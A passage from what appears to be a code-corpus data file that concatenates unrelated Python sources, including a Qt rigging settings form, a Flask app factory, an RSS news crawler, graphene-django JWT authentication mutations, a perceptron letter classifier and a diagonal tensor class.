self.color_fk_spinBox.setMaximum(31)
self.gridLayout_9.addWidget(self.color_fk_spinBox, 0, 2, 1, 1)
self.RGB_fk_pushButton = QPushButton(self.groupBox_4)
self.RGB_fk_pushButton.setObjectName(u"RGB_fk_pushButton")
sizePolicy3 = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
sizePolicy3.setHorizontalStretch(0)
sizePolicy3.setVerticalStretch(0)
sizePolicy3.setHeightForWidth(self.RGB_fk_pushButton.sizePolicy().hasHeightForWidth())
self.RGB_fk_pushButton.setSizePolicy(sizePolicy3)
self.RGB_fk_pushButton.setMaximumSize(QSize(16777215, 16777215))
self.RGB_fk_pushButton.setLayoutDirection(Qt.LeftToRight)
self.RGB_fk_pushButton.setStyleSheet(u"")
self.gridLayout_9.addWidget(self.RGB_fk_pushButton, 0, 3, 1, 1)
self.RGB_fk_slider = QSlider(self.groupBox_4)
self.RGB_fk_slider.setObjectName(u"RGB_fk_slider")
self.RGB_fk_slider.setMaximum(255)
self.RGB_fk_slider.setOrientation(Qt.Horizontal)
self.gridLayout_9.addWidget(self.RGB_fk_slider, 0, 4, 1, 1)
self.fk_label_2 = QLabel(self.groupBox_4)
self.fk_label_2.setObjectName(u"fk_label_2")
self.gridLayout_9.addWidget(self.fk_label_2, 0, 0, 1, 1)
self.gridLayout_7.addLayout(self.gridLayout_9, 1, 0, 1, 1)
self.gridLayout_10 = QGridLayout()
self.gridLayout_10.setObjectName(u"gridLayout_10")
self.color_ik_spinBox = QSpinBox(self.groupBox_4)
self.color_ik_spinBox.setObjectName(u"color_ik_spinBox")
sizePolicy2.setHeightForWidth(self.color_ik_spinBox.sizePolicy().hasHeightForWidth())
self.color_ik_spinBox.setSizePolicy(sizePolicy2)
self.color_ik_spinBox.setMaximum(31)
self.gridLayout_10.addWidget(self.color_ik_spinBox, 0, 2, 1, 1)
self.color_ik_label = QLabel(self.groupBox_4)
self.color_ik_label.setObjectName(u"color_ik_label")
sizePolicy1.setHeightForWidth(self.color_ik_label.sizePolicy().hasHeightForWidth())
self.color_ik_label.setSizePolicy(sizePolicy1)
self.color_ik_label.setMinimumSize(QSize(0, 0))
self.gridLayout_10.addWidget(self.color_ik_label, 0, 1, 1, 1)
self.RGB_ik_pushButton = QPushButton(self.groupBox_4)
self.RGB_ik_pushButton.setObjectName(u"RGB_ik_pushButton")
sizePolicy3.setHeightForWidth(self.RGB_ik_pushButton.sizePolicy().hasHeightForWidth())
self.RGB_ik_pushButton.setSizePolicy(sizePolicy3)
self.RGB_ik_pushButton.setMaximumSize(QSize(16777215, 16777215))
self.RGB_ik_pushButton.setLayoutDirection(Qt.LeftToRight)
self.RGB_ik_pushButton.setStyleSheet(u"")
self.gridLayout_10.addWidget(self.RGB_ik_pushButton, 0, 3, 1, 1)
self.RGB_ik_slider = QSlider(self.groupBox_4)
self.RGB_ik_slider.setObjectName(u"RGB_ik_slider")
self.RGB_ik_slider.setMaximum(255)
self.RGB_ik_slider.setOrientation(Qt.Horizontal)
self.gridLayout_10.addWidget(self.RGB_ik_slider, 0, 4, 1, 1)
self.ik_label = QLabel(self.groupBox_4)
self.ik_label.setObjectName(u"ik_label")
self.gridLayout_10.addWidget(self.ik_label, 0, 0, 1, 1)
self.gridLayout_7.addLayout(self.gridLayout_10, 1, 1, 1, 1)
self.overrideColors_checkBox = QCheckBox(self.groupBox_4)
self.overrideColors_checkBox.setObjectName(u"overrideColors_checkBox")
self.gridLayout_7.addWidget(self.overrideColors_checkBox, 0, 0, 1, 1)
self.useRGB_checkBox = QCheckBox(self.groupBox_4)
self.useRGB_checkBox.setObjectName(u"useRGB_checkBox")
self.gridLayout_7.addWidget(self.useRGB_checkBox, 0, 1, 1, 1)
self.gridLayout_8.addLayout(self.gridLayout_7, 2, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox_4, 4, 0, 1, 1)
self.mainSettings_groupBox = QGroupBox(Form)
self.mainSettings_groupBox.setObjectName(u"mainSettings_groupBox")
self.gridLayout_4 = QGridLayout(self.mainSettings_groupBox)
self.gridLayout_4.setObjectName(u"gridLayout_4")
self.formLayout = QFormLayout()
self.formLayout.setObjectName(u"formLayout")
self.name_label = QLabel(self.mainSettings_groupBox)
self.name_label.setObjectName(u"name_label")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.name_label)
self.name_lineEdit = QLineEdit(self.mainSettings_groupBox)
self.name_lineEdit.setObjectName(u"name_lineEdit")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.name_lineEdit)
self.side_label = QLabel(self.mainSettings_groupBox)
self.side_label.setObjectName(u"side_label")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.side_label)
self.side_comboBox = QComboBox(self.mainSettings_groupBox)
self.side_comboBox.addItem("")
self.side_comboBox.addItem("")
self.side_comboBox.addItem("")
self.side_comboBox.setObjectName(u"side_comboBox")
sizePolicy2.setHeightForWidth(self.side_comboBox.sizePolicy().hasHeightForWidth())
self.side_comboBox.setSizePolicy(sizePolicy2)
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.side_comboBox)
self.componentIndex_label = QLabel(self.mainSettings_groupBox)
self.componentIndex_label.setObjectName(u"componentIndex_label")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.componentIndex_label)
self.componentIndex_spinBox = QSpinBox(self.mainSettings_groupBox)
self.componentIndex_spinBox.setObjectName(u"componentIndex_spinBox")
sizePolicy2.setHeightForWidth(self.componentIndex_spinBox.sizePolicy().hasHeightForWidth())
self.componentIndex_spinBox.setSizePolicy(sizePolicy2)
self.componentIndex_spinBox.setMaximum(999)
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.componentIndex_spinBox)
self.conector_label = QLabel(self.mainSettings_groupBox)
self.conector_label.setObjectName(u"conector_label")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.conector_label)
self.connector_comboBox = QComboBox(self.mainSettings_groupBox)
self.connector_comboBox.addItem("")
self.connector_comboBox.setObjectName(u"connector_comboBox")
sizePolicy2.setHeightForWidth(self.connector_comboBox.sizePolicy().hasHeightForWidth())
self.connector_comboBox.setSizePolicy(sizePolicy2)
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.connector_comboBox)
self.gridLayout_4.addLayout(self.formLayout, 0, 0, 1, 1)
self.gridLayout.addWidget(self.mainSettings_groupBox, 0, 0, 1, 1)
self.groupBox_2 = QGroupBox(Form)
self.groupBox_2.setObjectName(u"groupBox_2")
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.gridLayout_5 = QGridLayout(self.groupBox_2)
self.gridLayout_5.setObjectName(u"gridLayout_5")
self.horizontalLayout_3 = QHBoxLayout()
self.horizontalLayout_3.setObjectName(u"horizontalLayout_3")
self.subGroup_lineEdit = QLineEdit(self.groupBox_2)
self.subGroup_lineEdit.setObjectName(u"subGroup_lineEdit")
self.horizontalLayout_3.addWidget(self.subGroup_lineEdit)
self.gridLayout_5.addLayout(self.horizontalLayout_3, 0, 0, 1, 1)
self.gridLayout.addWidget(self.groupBox_2, 3, 0, 1, 1)
self.jointSettings_groupBox = QGroupBox(Form)
self.jointSettings_groupBox.setObjectName(u"jointSettings_groupBox")
sizePolicy.setHeightForWidth(self.jointSettings_groupBox.sizePolicy().hasHeightForWidth())
self.jointSettings_groupBox.setSizePolicy(sizePolicy)
self.gridLayout_3 = QGridLayout(self.jointSettings_groupBox)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.verticalLayout = QVBoxLayout()
self.verticalLayout.setObjectName(u"verticalLayout")
self.horizontalLayout_5 = QHBoxLayout()
self.horizontalLayout_5.setObjectName(u"horizontalLayout_5")
self.horizontalLayout_5.setContentsMargins(-1, -1, -1, 0)
self.useJointIndex_checkBox = QCheckBox(self.jointSettings_groupBox)
self.useJointIndex_checkBox.setObjectName(u"useJointIndex_checkBox")
self.horizontalLayout_5.addWidget(self.useJointIndex_checkBox)
self.parentJointIndex_spinBox = QSpinBox(self.jointSettings_groupBox)
self.parentJointIndex_spinBox.setObjectName(u"parentJointIndex_spinBox")
sizePolicy2.setHeightForWidth(self.parentJointIndex_spinBox.sizePolicy().hasHeightForWidth())
self.parentJointIndex_spinBox.setSizePolicy(sizePolicy2)
self.parentJointIndex_spinBox.setMinimum(-1)
self.parentJointIndex_spinBox.setMaximum(999999)
self.parentJointIndex_spinBox.setValue(-1)
self.horizontalLayout_5.addWidget(self.parentJointIndex_spinBox)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.jointNames_label = QLabel(self.jointSettings_groupBox)
self.jointNames_label.setObjectName(u"jointNames_label")
sizePolicy4 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)
sizePolicy4.setHorizontalStretch(0)
sizePolicy4.setVerticalStretch(0)
sizePolicy4.setHeightForWidth(self.jointNames_label.sizePolicy().hasHeightForWidth())
self.jointNames_label.setSizePolicy(sizePolicy4)
self.jointNames_label.setMinimumSize(QSize(0, 0))
self.horizontalLayout.addWidget(self.jointNames_label)
self.jointNames_pushButton = QPushButton(self.jointSettings_groupBox)
self.jointNames_pushButton.setObjectName(u"jointNames_pushButton")
sizePolicy2.setHeightForWidth(self.jointNames_pushButton.sizePolicy().hasHeightForWidth())
self.jointNames_pushButton.setSizePolicy(sizePolicy2)
self.horizontalLayout.addWidget(self.jointNames_pushButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.groupBox_3 = QGroupBox(self.jointSettings_groupBox)
self.groupBox_3.setObjectName(u"groupBox_3")
self.horizontalLayout_4 = QHBoxLayout(self.groupBox_3)
self.horizontalLayout_4.setObjectName(u"horizontalLayout_4")
self.joint_offset_x_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_x_doubleSpinBox.setObjectName(u"joint_offset_x_doubleSpinBox")
self.joint_offset_x_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_x_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_x_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_x_doubleSpinBox)
self.joint_offset_y_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_y_doubleSpinBox.setObjectName(u"joint_offset_y_doubleSpinBox")
self.joint_offset_y_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_y_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_y_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_y_doubleSpinBox)
self.joint_offset_z_doubleSpinBox = QDoubleSpinBox(self.groupBox_3)
self.joint_offset_z_doubleSpinBox.setObjectName(u"joint_offset_z_doubleSpinBox")
self.joint_offset_z_doubleSpinBox.setMinimum(-360.000000000000000)
self.joint_offset_z_doubleSpinBox.setMaximum(360.000000000000000)
self.joint_offset_z_doubleSpinBox.setSingleStep(90.000000000000000)
self.horizontalLayout_4.addWidget(self.joint_offset_z_doubleSpinBox)
self.verticalLayout.addWidget(self.groupBox_3)
self.gridLayout_3.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.gridLayout.addWidget(self.jointSettings_groupBox, 1, 0, 1, 1)
self.retranslateUi(Form)
QMetaObject.connectSlotsByName(Form)
# setupUi
def retranslateUi(self, Form):
Form.setWindowTitle(QCoreApplication.translate("Form", u"Form", None))
self.groupBox.setTitle(QCoreApplication.translate("Form", u"Channels Host Settings", None))
self.host_label.setText(QCoreApplication.translate("Form", u"Host:", None))
self.host_pushButton.setText(QCoreApplication.translate("Form", u"<<", None))
self.groupBox_4.setTitle(QCoreApplication.translate("Form", u"Color Settings", None))
self.color_fk_label.setText("")
self.RGB_fk_pushButton.setText("")
self.fk_label_2.setText(QCoreApplication.translate("Form", u"FK", None))
self.color_ik_label.setText("")
self.RGB_ik_pushButton.setText("")
self.ik_label.setText(QCoreApplication.translate("Form", u"IK", None))
self.overrideColors_checkBox.setText(QCoreApplication.translate("Form", u"Override Colors", None))
self.useRGB_checkBox.setText(QCoreApplication.translate("Form", u"Use RGB Colors", None))
self.mainSettings_groupBox.setTitle("")
self.name_label.setText(QCoreApplication.translate("Form", u"Name:", None))
self.side_label.setText(QCoreApplication.translate("Form", u"Side:", None))
self.side_comboBox.setItemText(0, QCoreApplication.translate("Form", u"Center", None))
self.side_comboBox.setItemText(1, QCoreApplication.translate("Form", u"Left", None))
self.side_comboBox.setItemText(2, QCoreApplication.translate("Form", u"Right", None))
self.componentIndex_label.setText(QCoreApplication.translate("Form", u"Component Index:", None))
self.conector_label.setText(QCoreApplication.translate("Form", u"Connector:", None))
self.connector_comboBox.setItemText(0, QCoreApplication.translate("Form", u"standard", None))
self.groupBox_2.setTitle(QCoreApplication.translate("Form", u"Custom Controllers Group", None))
#if QT_CONFIG(tooltip)
self.subGroup_lineEdit.setToolTip(QCoreApplication.translate("Form", u"<html><head/><body><p>Name for a custom controllers Group (Maya set) for the component controllers.</p><p align=\"center\"><span style=\" font-weight:600;\">i.e</span>: Setting the name "arm" will create a sub group (sub set in Mayas terminology) with the name "rig_arm_grp". This group will be under the "rig_controllers_grp"</p><p>Leave this option empty for the default behaviour.</p></body></html>", None))
#endif // QT_CONFIG(tooltip)
self.jointSettings_groupBox.setTitle(QCoreApplication.translate("Form", u"Joint Settings", None))
self.useJointIndex_checkBox.setText(QCoreApplication.translate("Form", u"Parent Joint Index", None))
self.jointNames_label.setText(QCoreApplication.translate("Form", u"Joint Names", None))
self.jointNames_pushButton.setText(QCoreApplication.translate("Form", u"Configure", None))
self.groupBox_3.setTitle(QCoreApplication.translate("Form", u"Orientation Offset XYZ", None))
#if QT_CONFIG(tooltip)
self.joint_offset_x_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset X", None))
#endif // QT_CONFIG(tooltip)
#if QT_CONFIG(tooltip)
self.joint_offset_y_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset Y", None))
#endif // QT_CONFIG(tooltip)
#if QT_CONFIG(tooltip)
self.joint_offset_z_doubleSpinBox.setToolTip(QCoreApplication.translate("Form", u"Rotation Offset Z", None))
#endif // QT_CONFIG(tooltip)
# retranslateUi
| 2.09375
| 2
|
app/__init__.py
|
sd19surf/flask
| 0
|
12782895
|
from flask import Flask
def create_app():
app = Flask(__name__)
# register routes with app instead of current_app:
from app.main import bp as main_bp
app.register_blueprint(main_bp)
return app
| 1.992188
| 2
|
newspaper_crawler/crawling_jobs/futurasciences_crawling_job.py
|
jeugregg/newspaper-crawler
| 8
|
12782896
|
<reponame>jeugregg/newspaper-crawler
from .base_crawling_job import BaseCrawlingJob
from ..spiders import FuturaSciencesSpider
class FuturaSciencesCrawlingJob(BaseCrawlingJob):
def __init__(self, has_database):
BaseCrawlingJob.__init__(self, has_database)
self.newspaper = "futura-sciences"
self.NewspaperSpider = FuturaSciencesSpider
self.rss_feeds = [
"http://www.futura-sciences.com/rss/actualites.xml",
"http://www.futura-sciences.com/rss/sante/actualites.xml",
"http://www.futura-sciences.com/rss/high-tech/actualites.xml",
"http://www.futura-sciences.com/rss/espace/actualites.xml",
"http://www.futura-sciences.com/rss/environnement/actualites.xml",
"http://www.futura-sciences.com/rss/maison/actualites.xml",
"http://www.futura-sciences.com/rss/nature/actualites.xml",
"http://www.futura-sciences.com/rss/terre/actualites.xml",
"http://www.futura-sciences.com/rss/matiere/actualites.xml",
"http://www.futura-sciences.com/rss/mathematiques/actualites.xml",
]
| 2.640625
| 3
|
justice/parser/line_parser/abc.py
|
it-matters-cz/justice
| 0
|
12782897
|
<filename>justice/parser/line_parser/abc.py<gh_stars>0
import abc
import dateparser
class AbstractLineParser:
def parse(self, data):
parsed_date = None
parsed_data = self.parse_data(data[0])
if len(data) > 1:
parsed_date = self.parse_date(data[1])
return parsed_data, parsed_date
@abc.abstractmethod
def parse_data(self, data):
pass
@staticmethod
def parse_date(data: str):
result = {}
expire = data.split('\n')
expire_from = expire[0].replace('zapsáno\xa0', '')
result['valid_from'] = dateparser.parse(expire_from)
if len(expire) == 2:
expire_to = expire[1].replace('vymazáno\xa0', '')
result['valid_to'] = dateparser.parse(expire_to)
return result
| 3.34375
| 3
|
dwconv1d/__init__.py
|
ashishpatel26/depthwiseconv1d
| 6
|
12782898
|
from .depthwiseconv1d import DepthwiseConv1D
__all__ = [
'DepthwiseConv1D'
]
| 1.0625
| 1
|
graphene_django_jwt/schema/mutations.py
|
Speedy1991/graphene-django-jwt
| 0
|
12782899
|
from calendar import timegm
from django.contrib.auth import get_user_model
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.db import transaction
import graphene
from graphene.types.generic import GenericScalar
from graphene_django_jwt import signals
from graphene_django_jwt.blacklist import Blacklist
from graphene_django_jwt.decorators import login_required
from graphene_django_jwt.exceptions import JSONRefreshTokenExpired, JSONWebTokenExpired, PermissionDenied
from graphene_django_jwt.models import RefreshToken
from graphene_django_jwt.shortcuts import get_refresh_token, get_token
from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload
UserModel = get_user_model()
class RevokeAllTokensMutation(graphene.Mutation):
revoked_tokens = graphene.List(graphene.NonNull(graphene.String), required=True)
@login_required
def mutate(self, info, **kwargs):
revoked_tokens = []
for rt in RefreshToken.objects.filter(user_id=info.context.user.id, revoked__isnull=True):
rt.revoke()
revoked_tokens.append(rt.get_token())
return RevokeAllTokensMutation(revoked_tokens=revoked_tokens)
class ObtainJSONWebTokenMutation(graphene.Mutation):
token = graphene.String(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
username = graphene.String(required=True)
password = graphene.String(required=True)
def mutate(self, info, username, password):
user = UserModel.objects.filter(username=username).first()
if user is None:
raise PermissionDenied
if not user.is_active:
raise PermissionDenied
if not user.check_password(password):
raise PermissionDenied
refresh_token = create_refresh_token(user).get_token()
payload = jwt_payload(user, refresh_token=refresh_token)
token = jwt_encode(payload)
user_logged_in.send(sender=ObtainJSONWebTokenMutation, request=info.context, user=user)
return ObtainJSONWebTokenMutation(token=token, refresh_token=refresh_token)
class RefreshMutation(graphene.Mutation):
token = graphene.String(required=True)
payload = GenericScalar(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
if refresh_token.revoked:
raise JSONRefreshTokenExpired
if refresh_token.is_expired():
raise JSONRefreshTokenExpired
refreshed_token = refresh_token.rotate()
payload = jwt_payload(refresh_token.user, refresh_token=refreshed_token.get_token())
token = jwt_encode(payload)
signals.refresh_finished.send(
sender=RefreshToken,
user=refresh_token.user,
request=info.context,
)
return RefreshMutation(token=token, payload=payload, refresh_token=refreshed_token.get_token())
class RevokeMutation(graphene.Mutation):
revoked = graphene.Int(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
return RevokeMutation(revoked=timegm(refresh_token.revoked.timetuple()))
class VerifyMutation(graphene.Mutation):
payload = GenericScalar(required=True)
class Arguments:
token = graphene.String(required=True)
def mutate(self, info, token):
payload = get_payload(token)
if Blacklist.is_blacklisted(payload['refresh_token']):
raise JSONWebTokenExpired
return VerifyMutation(payload=payload)
class LogoutMutation(graphene.Mutation):
success = graphene.Boolean(required=True)
class Arguments:
refresh_token = graphene.String(required=False)
@login_required
def mutate(self, info, refresh_token=None, **kwargs):
if refresh_token:
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
user_logged_out.send(sender=self.__class__, request=info.context, user=info.context.user)
return LogoutMutation(success=True)
class SignUpMutation(graphene.Mutation):
token = graphene.String(required=True)
class Arguments:
password = graphene.String(required=True)
username = graphene.String(required=True)
@transaction.atomic
def mutate(self, info, username, password, **kwargs):
user = UserModel.objects.create_user(
username=username,
password=password,
)
refresh_token = create_refresh_token(user)
token = get_token(
user,
refresh_token=refresh_token.token,
)
user_logged_in.send(sender=user.__class__, request=info.context, user=user)
return SignUpMutation(token=token)
class Mutation(graphene.ObjectType):
jwt_sign_in = ObtainJSONWebTokenMutation.Field(required=True)
jwt_sign_up = SignUpMutation.Field(required=True)
jwt_refresh_token = RefreshMutation.Field(required=True)
jwt_revoke_token = RevokeMutation.Field(required=True)
jwt_verify_token = VerifyMutation.Field(required=True)
jwt_revoke_all_tokens = RevokeAllTokensMutation.Field(required=True)
jwt_logout = LogoutMutation.Field(required=True)
| 1.96875
| 2
|
My_NN.py
|
aaksul/Classifying-Letters-With-Perceptron-Method
| 0
|
12782900
|
import numpy as np
class layer():
def __init__(self,name,type,nodes_number):
self.name=name
self.type=type
self.nodes_number=nodes_number
self.input_values=np.zeros(shape=(nodes_number,1),dtype=float)##input values of nodes
self.sum_values=np.zeros(shape=(nodes_number,1),dtype=float)##sum values of nodes
self.output_values=np.zeros(shape=(nodes_number,1),dtype=float)##output values of nodes
def set_input_values(self,input):
self.input_values=input
if (self.type=="input"):
self.set_output_values(input)
def set_output_values(self,output):
self.output_values=output
class Model():
def __init__(self,method,input_type,perceptron_rule):
self.method=method##method
self.perceptron_rule=perceptron_rule
self.layers=[]##layers of Model
self.input_type=input_type
"""For Training """
self.Connections_Weight=[]## weight of Connections are stored
self.Connections_Bias=[]##Bias of Connections are stored
self.input_number=0##total input number for training model, using for iteration during epoch state
self.input_length=0##each input's length also output array length
self.input_arr=0##input array
self.output_arr=0##output array
self.output_length=0##output length
def add_layer(self,layer):
self.layers.append(layer)
def create_weight_and_bias_array(self,layer1,layer2,bias):
##create arrays as correspond to connections with layers nodes number
w_array=np.zeros(shape=(layer1.nodes_number,layer2.nodes_number),dtype=float)
self.Connections_Weight.append(w_array)##append to model weight list
b_array=np.full(shape=(layer2.nodes_number),fill_value=float(bias))
self.Connections_Bias.append(b_array)
def set_input_values(self,input_arr,input_number,input_length):
if(type(input_arr)!=np.ndarray):
raise Exception("Type Error: given input aren't ndarray")
input_layer=self.layers[0]
if not(input_length==input_layer.input_values.shape[0]):
raise Exception("input's length and nodes number of input layer aren't matched")
self.input_number=input_number
self.input_length=input_length
self.input_arr=input_arr
def set_output_values(self,output_arr,output_length):
if(type(output_arr)!=np.ndarray):
raise Exception("Type Error: given output aren't ndarray")
output_layer=self.layers[-1]
if not(output_length==output_layer.output_values.shape[0]):
raise Exception("output's length and nodes number of output layer aren't matched")
self.output_length=output_length
self.output_arr=output_arr
def activation_func(self,y_in,th):
y=1.0
if (-th < y_in < th):
y=0
elif (y_in<-th):
y=-1.0
return y
def activation_func_bin(self,y_in,th):
y=1.0
if (y_in < th):
y=0
return y
def default_rule(self,input_arr,out,w_array,b_array,n,j):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*out*inp
b_array[j]=b_array[j]+n*out##Update bias value
def delta_rule(self,input_arr,out,w_array,b_array,n,j,y):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*(out-y)*inp
b_array[j]=b_array[j]+n*(out-y)##Update bias value
def Feed_Forward_Perceptron(self,input_arr,output_arr,n,th):
#bool=np.full((input_layer.nodes_number,output_layer.nodes_number),False)##boolean matrix for weight values
#while bool.all()!=True:##Until weights for each connections maintaing equation
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
y=0
for j,out in enumerate(output_arr):
y_in=0## sum
for i,inp in enumerate(input_arr):
y_in+=inp*w_array[i][j]
y_in+=b_array[j]##bias
if(self.input_type=="binary"):##activation
y=self.activation_func_bin(y_in,th)
elif(self.input_type=="bipolar"):
y=self.activation_func(y_in,th)
if(y!=out):
if self.perceptron_rule == "default":
self.default_rule(input_arr,out,w_array,b_array,n,j)
if self.perceptron_rule == "delta":
self.delta_rule(input_arr,out,w_array,b_array,n,j,y)
def Perceptron(self,learning_rate,epoch,threshold,bias):
iter=0
self.create_weight_and_bias_array(self.layers[0],self.layers[1],bias)#give input and output layer as arguments
acc=[]
while iter!=epoch:
for i in range(self.input_number):
self.Feed_Forward_Perceptron(self.input_arr[i],self.output_arr[i],learning_rate,threshold)
iter+=1
if(iter%1==0):
print("epoch="+str(iter))
accuracy=self.predict(self.input_arr,self.output_arr,map_prediction=False)
acc.append(accuracy)
return acc
#print("!!!Weights Matrix After Training!!!"+str(self.input_length)+"X"+str(self.output_length))
#print(self.Connections_Weight[0])
def train(self,learning_rate,epoch,bias,threshold):#return accuracy value of each epoch
if self.method=="perceptron":
acc=self.Perceptron(learning_rate,epoch,threshold,bias)
return acc
def predict_per_once(self,input,output):##predict a input
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
pred_result=np.zeros(shape=(self.output_length),dtype=np.float64)
for j,out in enumerate(output):
y_in=0.0
for i,inp in enumerate(input):
w=w_array[i][j]
y_in+=inp*w_array[i][j]
y_in+=b_array[j]
pred_result[j]=int(y_in)
return pred_result
def Map_Pred_Matrix(self,results):##listing predictions on matrix with pred value as x, real value as y
print("""!!!!!!!!Results Of Prediction Of Given Inputs!!!!!!!!""")
sep=" | "
Letters=["L","A","B","C","D","E","J","K"]
l=sep.join(map(str,Letters))
print("\t"+l)
for i,row in enumerate(results):
print("\t-----------------------------")
x=sep.join(map(str,row))
print("\t"+Letters[i+1]+" | "+x)
def predict(self,inputs,labels,map_prediction):##array that have more than one input as argument
true_result=0
false_result=0
results=[[0 for x in range(self.output_length)] for x in range(self.output_length)]
for i,input in enumerate(inputs):
pred_result=self.predict_per_once(input,labels[i])
pred_class=np.argmax(pred_result)##return index of max value as predicted class
real_class=np.where(labels[i]==1)[0][0]
results[pred_class][real_class]+=1
if pred_class==real_class:
true_result+=1
else:
false_result+=1
if(map_prediction==True):
self.Map_Pred_Matrix(results)
accuracy=float(true_result) / float(true_result+false_result)
print("accuracy=>"+str(accuracy))
return accuracy
| 3.203125
| 3
|
src/CTL/tensor/diagonalTensor.py
|
CaoRX/CTL
| 11
|
12782901
|
import CTL.funcs.xplib as xplib
from CTL.tensorbase.tensorbase import TensorBase
import CTL.funcs.funcs as funcs
# import numpy as np
from copy import deepcopy
from CTL.tensor.leg import Leg
from CTL.tensor.tensor import Tensor
import warnings
class DiagonalTensor(Tensor):
"""
The class for diagonal tensors, inheriting from Tensor
1. A data tensor as 1D-array: the elements on the main diagonal;
2. A set of legs, corresponding to each dimension of the tensor.
3. Other information(degree of freedom, total element number, ...)
Diagonal Tensors: a tensor with only non-zero elements on its main diagonal, e.g., for a 3-dimensional diagonal tensor A, only A_{iii} is non-zero, while A_{123} must be zero.
This class is also used for DiagonalTensorLike, an object that behaves almost the same as DiagonalTensor, but without data.
In the following docstrings we will take the number of elements as $n$, the dimension as $d$, and then make some statements on the time efficiency for some functions.
In other part of docstrings, we will not talk about Tensor and DiagonalTensor separately except for special cases.
Parameters
----------
shape : None or tuple of int, optional
The expected shape of the tensor.
labels : None or tuple of str, optional
The labels to be put for each dimension, if None then automatically generated from lower case letters.
data : None or ndarray or 1D-array of float, optional
The data in the tensor.
If None and the data is needed(not TensorLike), then generated as xplib.xp.random.random_sample.
If shape is given, data does not need to have the same shape as "shape", but the number of elements should be the same.
If 1D-array, then taken as the diagonal elements, can be used for diagonal tensors of any rank.
degreeOfFreedom : None or int, optional
Local degree of freedom for this tensor.
name : None or str, optional
The name of the tensor to create.
legs : None or list of Leg, optional
The legs of this tensor. If None, then automatically generated.
diagonalFlag : bool, default False
Whether this tensor is diagonal tensor or not. Diagonal tensors can behave better in efficiency for tensor contractions, so we deal with them with child class DiagonalTensor, check the details in CTL.tensor.diagonalTensor.
tensorLikeFlag : bool, default False
If True, then the tensor is a "TensorLike": will not contain any data, but behave just like a tensor.
xp : object, default numpy
The numpy-like library for numeric functions.
Attributes
----------
tensorLikeFlag : bool
Whether the tensor is a "TensorLike".
xp : object
The numpy-like library for numeric functions.
diagonalFlag : bool
Whether the tensor is a "DiagonalTensor"
totalSize : int
Total number of components in this tensor.
degreeOfFreedom : int
Number of local degree of freedom. E.g. for Ising Tensor around one spin, it can be 1.
name : None or str
The name of the tensor.
legs : list of Leg
The legs from this tensor, can be "attracted" to another leg to form a bond. If not so, then it is a free leg.
a : ndarray of float
The data of the tensor.
Notes
-----
Please note shape, labels, data and legs: although they are all optional, they need to contain enough(and not contradictory) information for deduce the shape, labels, data and legs for the tensor, the deduction strategy is described below:
For labels: priority is legs = labels, default: auto-generated in order from lowercase letters.
For shape: priority is legs = shape > data.
For legs: priority is legs, default: auto-generated with labels and shape.
For data: priority is data.reshape(shape), default: xplib.xp.random.random_sample(shape).
("For property A, priority is B > C = D > E, default: F" means, A can be deduced from B, C, D, E, so we consider from high priority to low priority. If B exist, then we take the deduced value from B, and change C, D, E if they in some sense compatible with B. Otherwise consider C & D. For values of the same priority, if both of them are provided, then they should be the same. If none of B, C, D, E can deduce A, then generate A with F.)
"checkXXXYYYCompatible" functions will do the above checkings to make the information in the same priority compatible with each other.
"""
def deduceDimension(self, data, labels):
"""
Deduce the dimension of current diagonal tensor from data and labels.
Parameters
----------
data : None or 1D array or ndarray
The data to be put in the diagonal tensor.
labels : None or list of Leg
The labels to be added to the legs of this tensor.
Returns
-------
int
The dimension of the current tensor.
"""
# if the labels is given: then use labels
# otherwise, if data is given(as an ndarray), then we return then len(data.shape)
# otherwise, error
if (data is not None) and (len(data.shape) != 1) and (labels is not None) and ((len(labels) != len(data.shape)) or (len(labels) == 0 and len(data.shape) == 1)):
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "data {} and labels {} are not compatible.".format(data, labels)))
# what if len(labels) == 0, len(data.shape) == 1?
if (labels is not None):
return len(labels)
elif (data is not None):
# then data must be an numpy array
